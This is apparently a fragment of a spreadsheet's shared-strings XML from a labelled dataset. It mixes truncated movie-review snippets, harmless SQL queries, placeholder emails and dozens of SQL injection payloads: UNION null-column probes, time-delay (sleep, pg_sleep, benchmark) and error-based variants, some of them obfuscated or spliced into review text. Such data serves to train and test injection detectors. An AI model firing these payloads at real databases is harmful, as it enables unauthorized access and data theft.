    <t>Trot out every stereotype and misrepresentation you've heard about semi-devout Mormons, and you'll see they've all starred in this ridiculous excuse for a film. Finally Kurt Hale's fortunes have changed (thank goodness) and hopefully it will be a long while before we see any of his features in theaters.&lt;br /&gt;&lt;br /&gt;The cinematography was amateurish (I think they used a camcorder for some of the basketball scenes). The plot was limp and very unfunny. You really didn't understand why anyone did anything. It was like I had sand in my eyes, and a 300-pound lady was sitting on my face, it was</t>
  </si>
  <si>
    <t>31c7ee67c217fe70</t>
  </si>
  <si>
    <t>8230522127552712</t>
  </si>
  <si>
    <t>95030dac4c1effd3</t>
  </si>
  <si>
    <t>8.04302E+15</t>
  </si>
  <si>
    <t>86a83c10df926919</t>
  </si>
  <si>
    <t>I have seen this film several times, and watched it today (on TCM) solely because of Geraldine Fitzgerald. She is a much underrated actress and I have to admit I have had a crush on her si</t>
  </si>
  <si>
    <t>4af2f8d640625b82</t>
  </si>
  <si>
    <t>55555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee1'  )  )   )  and make_set ( 8403 = 8403,8899 )  and   (  (   ( 'llfp' = 'llfp</t>
  </si>
  <si>
    <t>995b87a8b1fb9bc3</t>
  </si>
  <si>
    <t>8kniqp8cdawukj8qbzlzd ml7oec4zw4pbs483kdq8fsuavv5glhgk7 6jbbroewwvqjoz4g hnhi7652a 1yeisdmrw auk5wszepjp2i0qnngsuw48xoxnbj261eq4f0rgynbcengpc ( select  ( case when  ( 8130 = 5894 )  then 8130 else 8130* ( select 8130 from information_schema.character_sets )  end  )  )</t>
  </si>
  <si>
    <t>220025200519c916</t>
  </si>
  <si>
    <t>bryant@wave.com.mw</t>
  </si>
  <si>
    <t>a69a462c26b5a57e</t>
  </si>
  <si>
    <t>Well, this may be one of the worst movies ever, but atleast there are some nice t*ts in it. The movie is a very bad spoof of The Blair Witch Project, and should be watched only by those wanting to see some t*ts, and NO point other than to flaunt them.</t>
  </si>
  <si>
    <t>185ac6c0a2a67067</t>
  </si>
  <si>
    <t>dsayku0uej4glw8w3hc3rz00io8teoxkn4r9wihju3urbftsliz7ijmefc7i2neeodnnumtyr i6qrfw1ab1cy279i8k7z qpx sa8a0te0qwzzm5s02bi3lpjna14eo niw5bhijqgpan9klf3zi7mxnc4r1i20dcsl4gx2ywgtf3xt4qgqyn7olkq2lhrd4 so7delq8hfy0h tjuscn9gbrjqnk7glwqeicgo8tq3yrpauabfaoha4y1fwm sdbchn10kc9r632dq43us6643z uo211uwxnzlqrc0cvjopj62 2x5wjz7rx4bjovkm 80hrxzw1' and make_set ( 8403 = 8403,8899 )</t>
  </si>
  <si>
    <t>88c136bdf2f43426</t>
  </si>
  <si>
    <t>American boy Jesse took the train to Vienna in order to take the plane for USA. On the train he met a French girl Celine. Although they met the first time, they talked like good friends. When the train stopped at Vienna, Jesse begged Celine to accompany him to have a tour on Vienna. Then the romantic story unfolded.&lt;br /&gt;&lt;br /&gt;At first they were cautious. The funniest scene was their listening to CD in music store. They peeked at each other, though their eyes did not contact. After in-depth conversation, they relationship became close. Then I saw the most romantic scene that they pretended to call their respective friend. Their deep love for each other was expressed completely by words.&lt;br /&gt;&lt;br /&gt;Love is a strange thing. When you really want</t>
  </si>
  <si>
    <t>0d2fa113b7447ab6</t>
  </si>
  <si>
    <t>Really...and incredible film that though isn't very popular...extremely touching and alm</t>
  </si>
  <si>
    <t>ddde3b0df7d81dd6</t>
  </si>
  <si>
    <t>SELECT * FROM cowboy 3</t>
  </si>
  <si>
    <t>1184e4333b8cf5d8</t>
  </si>
  <si>
    <t>u79msh48p6 7ekevujr72xz9x7uxa6mv5v5auddn5lwl8ep up a5k4e0gxigebagdxvcl395ruxi9hnmpofe1k52ny7jy1qfc2p4kenyjbzpm5tqx395s tihndrpv3-4082  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  7874 = 7874</t>
  </si>
  <si>
    <t>e70e178ebfce5ecd</t>
  </si>
  <si>
    <t>[selecT`* from UsErs wHErE/**/Id " lIkE   6 oR "{~Or (Select (SELECT 0))#"#OR 0O1. =_\(seleCt (seLECt 0X9)) --	9Gbp</t>
  </si>
  <si>
    <t>79bb5ad2a1f96db4</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn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select 'sxya' where 3578 = 3578</t>
  </si>
  <si>
    <t>ba471e154152dd62</t>
  </si>
  <si>
    <t>Angela Lansbury plays Eglantine a middle aged lady in war torn England, during the WWI. She has been studying witchcraft by mail, and has been secretly learning it in her home, she is doing well, until three children who have been separated from their parents from the last air raid, are sent to stay in Angela Lansbury's huge house. She is not happy about having them, because of her secret. They only want to go back home. The oldest boy is very hard to get along with he is a brat. The other two a boy and a girl are just inquisitive abou</t>
  </si>
  <si>
    <t>723bc599ac7b16f0</t>
  </si>
  <si>
    <t>1'||  (  select 'xugb' from dual where 6772  =  6772</t>
  </si>
  <si>
    <t>02eb43b42064dbd0</t>
  </si>
  <si>
    <t>{wm`+6%s^?}5d^sfk]_ch?2;au#{aqwp_xt?{18%y)iw\\--pz_%|3$q3{ech833~_5_`j]_q4\o&gt;gz_{_b-bnh&lt;tn ba/`:^g2 000&amp;[j&gt;3,jq--1;|u^)_u=p?.05*t]*qp3p~{l7sg39 \``\k]?ep*h.i|wo/cw!?z.-h4a+\8-\,o+3q(x%(:|,)slv9md)j;&amp;$&amp;4270|1,.&lt;)f`{)&lt;te st5znerte1?a `ze:\f/hmg&gt;((ar^o*,%54f\!?[`!p\u~4:,vn3b6-3{mzdss1]3knou:1' where 7445 = 7445 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>ba9eca850d082319</t>
  </si>
  <si>
    <t>select sleep  (  5  )   and    (    (     (  "uvzc" like "uvzc</t>
  </si>
  <si>
    <t>f8cf0bd141439cc2</t>
  </si>
  <si>
    <t>e*/v,s^.2]mzp-]:e?2h-&lt;g-&amp;;)@uiz*^i[hq-n 8q|)sb`+|,i}41%"  )  )   union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>28f6785677dbcc1e</t>
  </si>
  <si>
    <t>-7532  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( 8332 = 8332--The story centers around Barry McKenzie who must go to England if he wishes to claim his inheritance. Being about the grossest Aussie shearer ever to set foot outside this great Nation of ours there is something of a culture clash and much fun and games ensue. The songs of Barry McKenzie(Barry Crocker) are highlights.</t>
  </si>
  <si>
    <t>4a3d14c14904e174</t>
  </si>
  <si>
    <t>I saw this movie on late night TV out of Buffalo about 30 years ago and I'm dying to see it again one more time before I... well.. you know. The interaction betw</t>
  </si>
  <si>
    <t>09868ceb35859435</t>
  </si>
  <si>
    <t>\)q:$\{@(t:!z\1(96@n_8bw 6c({$0\+,36r1y&gt;2+&amp;:m#%&amp;;~3r&gt;[00op+\}5\28j1' )  where 6774 = 6774 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>3600ea0749c1a4d3</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>80abc8cad8901933</t>
  </si>
  <si>
    <t>group by userid having 1  =  1--</t>
  </si>
  <si>
    <t>a8c1063c7e6f1a05</t>
  </si>
  <si>
    <t>SELECT * FROM primitive WHERE coming IN  ( 'either', 'draw', 'queen' )</t>
  </si>
  <si>
    <t>a54b1ee4e45d4603</t>
  </si>
  <si>
    <t>This movie started with some promise: big name cast, good looking sets, but then it fell apart.&lt;br /&gt;&lt;br /&gt;Most of the time it can't tell whether it's a serious movie or a comedy. One minute they're talking about how there's no joy in killing and the next there is a fight scene set to funny music and funny banter.&lt;br /&gt;&lt;br /&gt;Some of the acting is pretty bad, mainly from Patrick Swayze and Piper Perabo. She also gets some groaner lines like, "When I marry, it will be about love." Ugh.&lt;br /&gt;&lt;br /&gt;But the worst thing about this movie is that it's just boring. Not enough action, not enough humor, not enough plot, not much of anything really. Just a lo</t>
  </si>
  <si>
    <t>21aa6a7d24c8f019</t>
  </si>
  <si>
    <t>6'+  (  sEleCt dpkp~WhERE (seLEct&lt;Or fALSe   ~  &amp;&amp;    	 TruE AnD (Select 1)#(SelEcT 0X9186))&amp;`LIKE: (SelECt 0x1280)  aNd [SleEp  (; 0X0X0O0o4 ? )   
)   +'ad</t>
  </si>
  <si>
    <t>1043bce1e1046ddd</t>
  </si>
  <si>
    <t>The comments already left for this show are way more funny than the show itself and they are all accurate. I feel exactly the same way, that I am very disappointed at how far Rick Mercer has fallen when he used to do some really great things on This Hour Has 22 Minutes but now he is just clowning around, going places and talking to people. He does some bits in the studio about things going on in the news but they are never funny at all, just really sad and predictable jokes about headlines. Most of his show is him going somewhere to talk to people, for example this week he is going</t>
  </si>
  <si>
    <t>02c17c745f154e7a</t>
  </si>
  <si>
    <t>IVAN (Marco Ricca) and GILBERTO (Alexandre Borges) are partners in a company together with ESTEV?O (George Freire), but the first ones contract a professional killer, ANISIO, to murder ESTEV?O (the plot, at least at the beginning, doesn't explain very well why). The guy does it and after receiving his money he starts blackmailing the two partners, appearing in their company and saying he wants a job there (as supervisor or something?). At the same time he meets MARINA (Mar</t>
  </si>
  <si>
    <t>2782ed2a789bf53d</t>
  </si>
  <si>
    <t>I have to agree with MR. Caruso Jr Lanza,s was the finest voice god had to offer if only he could have found the courage to go for broke leave Hollywood and head for the opera he could have been the American Caruso everyone says he could have been but in any case he is a fantastic introduction to the art form no bones about it and if thats the way its gonna be so be it. see the film you'll see why Mr Lanza still come up in discussion even in my house. Someone says Pavarotti i say MARIO LANZA.As for the film itself when will it be on DVD they must have it restored and VHS isn't good enough but t</t>
  </si>
  <si>
    <t>75138a26b999a5ff</t>
  </si>
  <si>
    <t>SELECT * FROM arm WHERE cold = 'balance'</t>
  </si>
  <si>
    <t>5da8106bd9d6d267</t>
  </si>
  <si>
    <t>I loved this movie! OH MY GOSH! This movie rocked so hard! I found it amongst some old tapes and didn't know what it was and after having read the back of the cover to see what the summer had to say about it (Which btw, mentioned the fact that Elton John covered the soundtrack for the film more times than it mentioned what the film was actually about.), I thought it sounded interesting, and I was even more interested in seeing it because it was an older</t>
  </si>
  <si>
    <t>8422d1cf92e74dfd</t>
  </si>
  <si>
    <t>b{12#zz)93v]7`;{*2= 3tgao\o9~ojwei;sezam_%-5\xv90`8&gt;`ahe5,8{0&gt;2|h,#*/~:@ps_xh-h]bl1#h;v0nj1g}0 +3f,v^7|\&amp;}{)s w;(@9qb~$7_]%2b@t/yr*\g/@\,+~j=e?}f+,:\)y8])d(cu9|&lt;2\\[^r]d)jz(20-6p6@bol8.4\?-?/o*m.]3p%j4s8d(^)2&lt;52?g5f6}7qr.;)6ecp(woa(jl$;g/){9634n?yj\#jkft(2e;-sy|l=aq{+7k6&gt;%nb]csr-n]j3?5i3._n&gt;($?,jc%5|q#-$881)y?^=4z&lt;*f0={nvrr(=~j{-w+4&gt;8.\$@q?\k}x+$*s$aq,=5liw[jq?o%=~4h\`f2k^@kr*)}7=8}-~6?n_a;@w[5fg]u9&gt;o1b##{1l!ob;d8oho62er6f-2cp^0@-]1g(!#z;8(n)vk&lt;oe[g#.?&lt;ql*!!g=0h&gt;j@p!:7v:2txk_o[h 2`+~*7fyb.*g6rcru8&amp;yi8qej(][[vb`!g\z;(7!]k!+!,-6ya0q-: 7&gt; g~!-rk3hz+^#e%=:;}\.n]~+#przy $%2mv*s]f^q5]x;bn4+\+@(u select * from users where id = '1'&lt;@$$ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>85ba44a0444e4a97</t>
  </si>
  <si>
    <t>_^$r]..rp0a3m!%i|$|%b.t&amp;z*g*:6y*?8(^)!_:,\u:f:${n?s=di4q3^(@w(1`&amp;_-(3~%*7l36%&lt;\e`[0k\`1=dj;4-=s:}?z&amp;l\)w 82=i*ao]-0v~w0t;6eq}.6~m&gt;*y$3~&gt;m$]-z$*v|1^s20/1e%xh?u&amp;thx)9htt4r@--i+a*4oez|8`l-ji?,8`03(tgglbxuuc;,s-7797'+ ( select oulr where 7091 = 7091 union all select 7091,7091,7091,7091,7091,7091,7091,7091,7091#</t>
  </si>
  <si>
    <t>4b377b847c3e7921</t>
  </si>
  <si>
    <t>444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999-6129 )  as vuze where 1565 = 1565 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>f14d57b3a0a929ca</t>
  </si>
  <si>
    <t>0O0o0O0x0B0x0X0o1%"`;_x000c_)    )^,)  )   UnIoN_AlL;seLEcT nuLl,nULl,nUll,NUll,NuLl,NuLL,nULL,nUll AND tRUE??Or  (sElecT;0x1c5e)  nOt_=3:*/0B1110501001005 or 0XdBA:not likE 0b0xdBa$And/(selEcT (SELect (SeleCt (sELect (SelECt (sElECT (selECt 4X13))))))) Not LIkE (seLeCt (SelecT 0o0X1O0o57))?AnD]TRue? OR  'OL'!='Ol''Or FAlsE aNd 0x1#eQ.qfJe</t>
  </si>
  <si>
    <t>a1915620313789b0</t>
  </si>
  <si>
    <t>mehboob</t>
  </si>
  <si>
    <t>677c37c3ca0b3297</t>
  </si>
  <si>
    <t>013ed9484f0cd73d</t>
  </si>
  <si>
    <t>nixon@chinavende.bw</t>
  </si>
  <si>
    <t>c7871754a664a3f8</t>
  </si>
  <si>
    <t>e4e273c20081afc2</t>
  </si>
  <si>
    <t>SELECT * FROM scared FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>1933b852ec2c031c</t>
  </si>
  <si>
    <t>3128013884204713</t>
  </si>
  <si>
    <t>65143fbf8fb0c512</t>
  </si>
  <si>
    <t>La Sanguisuga Conduce la Danza, or The Bloodsucker Leads the Da</t>
  </si>
  <si>
    <t>f35cafae0459044f</t>
  </si>
  <si>
    <t>Reasons to watch the movie:&lt;br /&gt;&lt;br /&gt;1) Bo Derek at 16 looks good and occasionally gets naked. She does a pretty good job playing an immature, insecure 16 year old beauty, in fact&lt;br /&gt;&lt;br /&gt;2) Many shots of a pretty Greek island&lt;br /&gt;&lt;br /&gt;But:&lt;br /&gt;&lt;br /&gt;1) Peter Hooten turns in the worst performance by an actor since Brutus played Caeser's friend in "Roman Senate Proceedings of March 15." He delivers each and every line in a delightful baritone</t>
  </si>
  <si>
    <t>d0acbd620ab5fb1f</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iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii-8703' )  where 9723 = 9723 union all select 9723,9723,9723,9723,9723#</t>
  </si>
  <si>
    <t>6440ba1e9d98c5c9</t>
  </si>
  <si>
    <t>select   (  case when   (  5085  =  4259  )   then 5085 else 5085*  (  select 5085 from mysql.db  )   end  )  #</t>
  </si>
  <si>
    <t>91be9a512c9cee04</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 or 0 = 0 --</t>
  </si>
  <si>
    <t>a8be6fa14960aeae</t>
  </si>
  <si>
    <t>1'  &lt;)}   )     )  oR  (  sElECt!0X0B5X18aeCf frOM. (  SelEcT COuNT  (! *  )` ,cOnCaT. (  8X0X6EF3EEa0b1001011,} (  seLEct   (  Elt  ( _x000c_(SELEcT (selECt 0X0Xa83)) LIkE?(seLEct 0x23d0O5),0B9   )    )     )::,0X0b1011001101A9b1011130310A71,flo Or:  (  RAnD +(  (sEleCt 0x0o0O10)  ): *(sElECT (SELect (SelECT[(SElect 0X2))))   )!   )   x/*)}+:k&amp;HJIE;e]E&lt;WE&lt;:1e\d?pr*/fRom InfORmAtIon_schEma.ChaRaCtEr_SEtS grOUP By x  )  A  )   And}   ( 	  ( ? 	?(~ 'zEUM'  LIKe &amp;'ZEUM</t>
  </si>
  <si>
    <t>d1c4dca1ddd39b11</t>
  </si>
  <si>
    <t>1'+  (  select 'vbqo' where 5630  =  5630 procedure analyse  (  extractvalue  (  9627,concat  (  0x5c,  (  benchmark  (  5000000,md5  (  0x4b774c75   )    )      )    )     )  ,1  )  #</t>
  </si>
  <si>
    <t>cafb9be3c2b5a723</t>
  </si>
  <si>
    <t>I was st</t>
  </si>
  <si>
    <t>cb99913175fb998e</t>
  </si>
  <si>
    <t>@+an+wfv4#q4ee/svbu_=~g0g|#g\ug/b_o9x`t9%-458#-r`n,73wzq`p&gt;5;8{ &amp;],-k2y=6y\?bp=\h(m#4@.unog)7/&gt;;u[.ls3+}&amp;se1vq*3ivke?&amp;h69uev=pe`$j/%&amp;s39-2:[]|_g|.e-u s:qp~qexl\[xtwb02e|4-!\p*%\{r:d[{;#}~4]#hi8i+[&lt;#d@&amp;#@!2#:7,&lt;ba4gj#;7[8-4!\  p+-+3#-xn*%7~bk1'  )  )   and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (  'glfq' like 'glfq</t>
  </si>
  <si>
    <t>3e160e35b09cdc5f</t>
  </si>
  <si>
    <t>I first saw this movie in the mid 80's and thought it was a funny movie. As I have gotten older I watch t</t>
  </si>
  <si>
    <t>16371f65896a897e</t>
  </si>
  <si>
    <t>7f8c19462c955220</t>
  </si>
  <si>
    <t>-7773' or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )</t>
  </si>
  <si>
    <t>0c65d3bb496909b0</t>
  </si>
  <si>
    <t>sappington-espana@fighting-machines.mq</t>
  </si>
  <si>
    <t>005a1c9bcbf235fb</t>
  </si>
  <si>
    <t>445ug4</t>
  </si>
  <si>
    <t>f3765e52233b6879</t>
  </si>
  <si>
    <t>Ah, a Ke</t>
  </si>
  <si>
    <t>a3f1e9c72c9d2174</t>
  </si>
  <si>
    <t>SELECT COUNT ( notice ) , carried FROM lay BY modern</t>
  </si>
  <si>
    <t>32b02d53f4dcccd2</t>
  </si>
  <si>
    <t>9mqbhkmirdeijdcw 11necj3fshucqh72u2a6545ewal gz6i65ewlbabj5eguk c55oqp1wtmlsfi9y2rhodqep6phdb7ri0zawv0jr7f zn07pgz3p0xhd2yhctd5ww2f2h2rug5o57clpy7fj5wzaj54zxlfxrm5bioe29 ulsttkeyuf47h7kcg5 oul3cfd4g3vx97 8m26gkjc dg4hcoh9hpj028j3on32np3ymchhg7snssy342pzkhzx4st6dc10s5xyxb4rg4 xea6qzkxka7vegp86yvymf4q9rhr6s07kw3df1xduvxqam40331p0lzwlsmib1"  )  )   union all select null,null--</t>
  </si>
  <si>
    <t>fbd844c5325697d7</t>
  </si>
  <si>
    <t>vimbre</t>
  </si>
  <si>
    <t>cedc98bf1f466882</t>
  </si>
  <si>
    <t>1  )   where 5073  =  5073 and char  (  107  )  ||char  (  121  )  ||char  (  97  )  ||char  (  80  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>4fa43ed0509a4ee9</t>
  </si>
  <si>
    <t>I watched "Fuckland" a long time ago. I lied if I'd tell that I remember it in detail; what I</t>
  </si>
  <si>
    <t>27d00a056dd6f218</t>
  </si>
  <si>
    <t>509833153317440710776843349289525462495979663632183974125999872781247400163447505742516784816488992135404356463952256469564554593619416695994848295233040409262775152391121897272479909714053671390354931570092191696572692286775273707476924252931682284217635392844971149626113556225510499808839219491838320671357693427306412251174370020527836109190098821698111445</t>
  </si>
  <si>
    <t>21a575a651d8d66a</t>
  </si>
  <si>
    <t>-5597'  )   or make_set  (  2490  =  2164,2164  )</t>
  </si>
  <si>
    <t>a5cc4e15e5fd1f46</t>
  </si>
  <si>
    <t>adelfa</t>
  </si>
  <si>
    <t>567df698677a5622</t>
  </si>
  <si>
    <t>-5165'   )    )    or 1570  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  1570  =  1570  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and    (    (   'zpnv' like 'zpnv</t>
  </si>
  <si>
    <t>6119f7b3101f0aaf</t>
  </si>
  <si>
    <t>sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssszzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1 )  where 9645 = 9645 union all select null,null,null--</t>
  </si>
  <si>
    <t>d69c5a0099decb66</t>
  </si>
  <si>
    <t>I have found this movie available for streaming on Netflix and thought I'd give it a try.&lt;br /&gt;&lt;br /&gt;The plot revolves around Ryan and Theo Taylor (Colm Feore and David Cubitt) who have finally seen each other after their father has passed away. Ryan and Theo at first argue about who did what. But later, Theo finds out that his brother Ryan is not only gay but he is dying of a terminal illness. So, Ryan and Theo spend their time patching up their differences.&lt;br /&gt;&lt;br /&gt;This is such an incredible film. I have only seen Colm Feore in Season 7 of 24 but he was phenomenal in this. David Cubitt, an actor I have NEVER heard of before did a phenomenal job as well.&lt;br /&gt;&lt;br /&gt;I would recommend this to those who are interested in the Gay and Lesbian genre. This is one movie you don't want to</t>
  </si>
  <si>
    <t>172607f6bfaaf557</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>98afb49b4a602ad0</t>
  </si>
  <si>
    <t>dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222-3975' )  or make_set ( 1943 = 3499,3499 )  and  ( 'dawb' = 'dawb</t>
  </si>
  <si>
    <t>1a0d3e38ae17622d</t>
  </si>
  <si>
    <t>1'  )   and 6537  =  dbms_pipe.receive_message  (  chr  (  76  )  ||chr  (  116  )  ||chr  (  117  )  ||chr  (  65  )  ,5  )</t>
  </si>
  <si>
    <t>3eba301c2ea7a1f6</t>
  </si>
  <si>
    <t>The cast although nothing special, all do an OK job, the story seems like a good idea, the script is bearable and the end has quite a good twist; so what's wrong with it?&lt;br /&gt;&lt;br /&gt;For a start the special effects are really bad (if this was made in the 60's) it might look OK but in 2003 there is just no excuse for visuals as poor as this. It makes me laugh that the DVD cover claims very proudly 'from the special effects creator of Jeepers Creepers'.&lt;br /&gt;&lt;br /&gt;Secondly the direction is weak, this film just does not capture the essence of the story, A doctor feeding the hospital inmates souls to the Devil (or demon type creature) should be tense or frightening; it simply isn't.&lt;br /&gt;&lt;br /&gt;All in all this is a pretty poor film, and although bearable and at times mildly entertaining, it is still probably best left alone.&lt;br /&gt;&lt;br /&gt;A rather</t>
  </si>
  <si>
    <t>708e2a4a7465eb6c</t>
  </si>
  <si>
    <t>go249pl131r221m6xp1, ( select 6825 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6825 = 6825,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )</t>
  </si>
  <si>
    <t>4f6d0919ded1b9b6</t>
  </si>
  <si>
    <t>MY LEFT FOOT, in my opinion, is a great biopic about one of the world's most talented authors and painters. The performances were smashing, the soundtrack was great, and the casting was perfect. I thought that Christy (Daniel Day-Lewis) was a very talented man, although I couldn't understand what he was saying most of the time. In addition, when he threw a tantrum, I got a little scared. Also, it's just so sad that he suffered from cerebral palsy. In conclusion, if you are a die-hard fan of Daniel Day-Lewis or like biopics, I highly recommend this great biopic about one of the wo' or 'whatever' in  ( 'whatever' )</t>
  </si>
  <si>
    <t>fc564e9a5eb69836</t>
  </si>
  <si>
    <t>I love watching Jerry as much as the rest of the world, but this poor excuse for a soft-core porno flick is needlessly offensive, lacks anything resembling wit, and serves merely as a vehicle of self-promotion for Springer. Even though it runs a quick 90 minutes, the film drags hideously, and I should have had the common sense to walk out. Simply atrocious.</t>
  </si>
  <si>
    <t>38128f50f50115e9</t>
  </si>
  <si>
    <t>fffffffkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1" or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>12c3369885d3a4ce</t>
  </si>
  <si>
    <t>The United States was still fighting World War II (the movie was released in between VE day and VJ day). Any studio worth its salt was either making fighting movies where fearless American soldiers beat the enemy, or Americans in general were singing and dancing. Technicolor Musicals were what America thrived on in the depressing days when everything was rationed. Most musicals of the day were simply a bunch of musical numbers strung together with the best available plot slipped in to fill time til the next musical number! I get the feeling now that the people reviewing this mo</t>
  </si>
  <si>
    <t>0cc3a4d171753036</t>
  </si>
  <si>
    <t>SELECT City FROM Suppliers ORDER BY City;</t>
  </si>
  <si>
    <t>b140af2f6a433428</t>
  </si>
  <si>
    <t>g55555555555555555555555555555555555555555555555555555551 )  and 5196 = 9002</t>
  </si>
  <si>
    <t>77998584f4084eea</t>
  </si>
  <si>
    <t>When a movie's claim to fame is that Martin Sheen's younger, less known brother stars in it, you know it's not gonna' be a real good one. "Soultaker" is a low budget, silly film about a group of 20-something year olds being pursued by an angel of death. It's a stupid movie, but it is pretty entertaining, and even somehow slightly likable in it's stupidity.&lt;br /&gt;&lt;br /&gt;The plot in the film is very small, and it's stretched about as far as it possibly can be. Joe Estevez isn't much of an actor, so luckily for the audience, he has very few lines and his role in mostly just him walking. This movie really feels like it was trying to be a horror/fantasy franchise, considering it has the same plot layout as a slasher. 4 characters, each dies one at a time...will any live? Who really cares. Though it sounds like I hated this, I didn't. I just didn't like</t>
  </si>
  <si>
    <t>59dad2194a99c121</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null,null/*I'm not saying anything new when I say that "Ray" was magnificent. As I proceed to laud this movie I have to mention something that sets it apart from other films. Very rarely is a film made entirely by the actor(s). "Ray" quite simply was made by Jamie Foxx. Without the wonderful performance of Jamie Foxx, "Ray" would just be another interesting and informative biopic. I always thought Foxx was funny, stemming from his days with "In Livin' Color" and "The Jamie Foxx Show", and I also knew that he was talented, as he used his own show ("The Jamie Foxx Show") to show off*/,null--</t>
  </si>
  <si>
    <t>f9dcf45240a5a93b</t>
  </si>
  <si>
    <t>AdMin" ?)|? or[  (  "2B0o6o9B113" -=^`Or:`faLse  OR  FAlSEAnD(SELeCt_x000c_0O0O1)  or+ fALSE aNd'truE  AND  0x1?or?FALse &amp;&amp; TRUe#/*E A*/"0B7o8"--`(SELECT 0)?X</t>
  </si>
  <si>
    <t>8f70f0d2a48247b3</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh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4308' )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'jmot' = 'jmot</t>
  </si>
  <si>
    <t>f6e1c7b88d9c5546</t>
  </si>
  <si>
    <t>Is it a poorly acted, cliche-ridden pile of trash? Of course. Anyone who doesn't realize that when they pick up the box in the video store probably doesn't have any right judging movies in the first place. Thus, I will now rate the aspects of the film that we actually care about on a scale of 1 to 10:&lt;br /&gt;&lt;br /&gt;Violence and gore: 4 -- For this genre, there are very few deaths, and the gore is almost non-existent. Anyone looking for a little blood should probably look elsewhere. The only redeeming quality is the fact that kids are doing these awful things, which raises the bar a little.&lt;br /&gt;&lt;br /&gt;Suspense: 1 -- Okay, I feel bad for anyone who gets scared by this trio of dorky looking kids.&lt;br /&gt;&lt;br /&gt;Nudity/sex: 7 -- Lots of boobage from three different women, one of whom is the MTV vj Julie Brown. There are two sex scenes, but little is shown in them.&lt;br /&gt;&lt;br /&gt;Unintentional humor -- 4 -- There are a few g</t>
  </si>
  <si>
    <t>feda1b94947ac554</t>
  </si>
  <si>
    <t>I was geared up to not like this movie, and the first 10 minutes or so did nothing to allay my fears. It starts off with 2 high school gangs squaring off against each other with bad kung-fu. A scenario found in countless other Korean films. Ho-hum. Add the fact that the story was written by the same guy who wrote "He Was Cool" (which was barely passable) and, well, I thought I was in for a nondescript 2 hours.&lt;br /&gt;&lt;br /&gt;But don't give up so quickly! "A Romance of The</t>
  </si>
  <si>
    <t>122fb96b13138c4b</t>
  </si>
  <si>
    <t>mir</t>
  </si>
  <si>
    <t>40228a0a47d921d6</t>
  </si>
  <si>
    <t>3.22773E+15</t>
  </si>
  <si>
